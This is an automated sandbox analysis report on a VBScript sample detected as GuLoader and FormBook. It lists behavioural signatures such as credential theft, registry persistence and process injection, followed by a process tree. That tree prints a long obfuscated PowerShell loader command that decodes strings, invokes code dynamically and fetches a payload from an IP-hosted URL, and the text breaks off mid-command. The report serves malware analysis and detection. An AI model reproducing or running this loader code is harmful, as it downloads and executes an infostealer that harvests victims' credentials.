Edit tour
Windows
Analysis Report
01105751.vbs
Overview
General Information
Detection
FormBook, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Maps a DLL or memory area into another process
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 5176 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\01105 751.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 4340 cmdline:
ping googl e.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 3776 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 6704 cmdline:
ping %.%.% .% MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 2436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3224 cmdline:
C:\Windows \system32\ cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2268 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5692 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Retorsio nshandling enllustrat ioner = 1; $Elytriger ous='S';$E lytrigerou s+='ubstri n';$Elytri gerous+='g ';Function Programre gningsfunk tionens($R idderne){$ Retorsions handlingen nfraocular =$Ridderne .Length-$R etorsionsh andlingenl lustration er;For($Re torsionsha ndlingen=5 ; $Retorsi onshandlin gen -lt $R etorsionsh andlingenn fraocular; $Retorsio nshandling en+=(6)){$ Outsmokes+ =$Ridderne .$Elytrige rous.Invok e( $Retors ionshandli ngen, $Ret orsionshan dlingenllu strationer );}$Outsmo kes;}funct ion Gracy2 16($Begren des){. ($ Antediluvi anske) ($B egrendes); }$Diskoska steren=Pro gramregnin gsfunktion ens 's.per M L deoLan dszAccomiT urbolBryst lSu.loa In te/Linje5. ilfo.Brneb 0B,ddi ill i(MamelWKo rtsiExoran BowkndSp,d ho.urvew,n dtrsFjase utotNmilep Tb,een mar ga1San.u0B alli.Montr 0H,rsk;.yk ke BrakpWx anthi ,erv nReprs6tro va4Filet;D ,awc vidnx T,gue6Admi n4Cotra;In sci Un btr TogstvEgip t:Inter1Ri v l2For e1 daun. Gen s0Sknde)Ne utr Trak G RepudeGuld kc BelakTa ndloV.rde/ edb2Uheld 0Sknhe1Ele k.0Nell,0 ,rot1Un,en 0Skibi1sav ne MordFau togiKo,mer De,inearom ,fShipboHa paxxStork/ Inten1Spla s2Ds,es1 i lsk.Fylds0 Capri ';$S prayens=Pr ogramregni ngsfunktio nens 'Nond eU rubasVa neeBe,kir For -,geb lAR.bbegho lose Ta dn ParatPriv i ';$Repro grammes=Pr ogramregni ngsfunktio nens 'Stuf .hL.muctVe rsit Subsp Cosmo:etci f/Taksa/ I mpl8Morph7 Far,n.Bron z1Anal,2pr oc,1Ungl . unpol1Unpe r0F,nda5va rmt. Gr,n5 Roc,e4,sen t/SeksaOOv errmMismam T.buleLand lsForcetmi s,arAtropu Discop,isk e.AarsadUn sanesaanip BrodflDiam eonamatySa wai ';$Kre tidseffekt ernes=Prog ramregning sfunktione ns 'Vejkr> Phisa ';$A ntediluvia nske=Progr amregnings funktionen s 'Etam.iR aadie sadd xFasts ';$ Gunlaying= 'Forraadne lig';Gracy 216 (Progr amregnings funktionen s ' L urS AtikeSigna tRecon- ge neCPen,eo. endrnNovum tPrintelai lanPorphtS t ir Peatw -AngloPObi taa elvetS ymbohP,esh TrvemT,ou gh: ,aad\ Afv I Ceri d.roldrChe skt UdpasF ilerfMenne o C,lorsol ,ceSuavenp haneiIndle nAabengSee pssUnche1P re i9Wi,db 7Super.Rad iotNiveax t rrt Duod Evole-Un mmV selraM oraklPeric uUnmoueAdv oc Melle$s amstG esti u AppenRe, orl TeleaA nmrkySapon iImmunn Be hvgAh.eh;C habo ');Gr acy216 (Pr ogramregni ngsfunktio nens ' Fra miHabi,fCa cos larit( GrectV.st fe.olfisTa lertRidge- OzonopJu i aaStoddtTa barhPigl, Pse THaand :Mosen\Kom plI .oemd ilker tige tEperosKri g,f ColloP l.udr Subs eMad lnNon moiKromgnE nok g Saxo sHaand1 Tw ir9Op oe7 Lov..Fedts t An txfar vet Rede) rtss{ Ka.m e KropxFak siiUdsket Sang} Un s ; Gro, '); $Kvrne = P rogramregn ingsfunkti onens 'Ned raeUnconcU an.ghPet o oPaatn Mun ke%Kys.eaC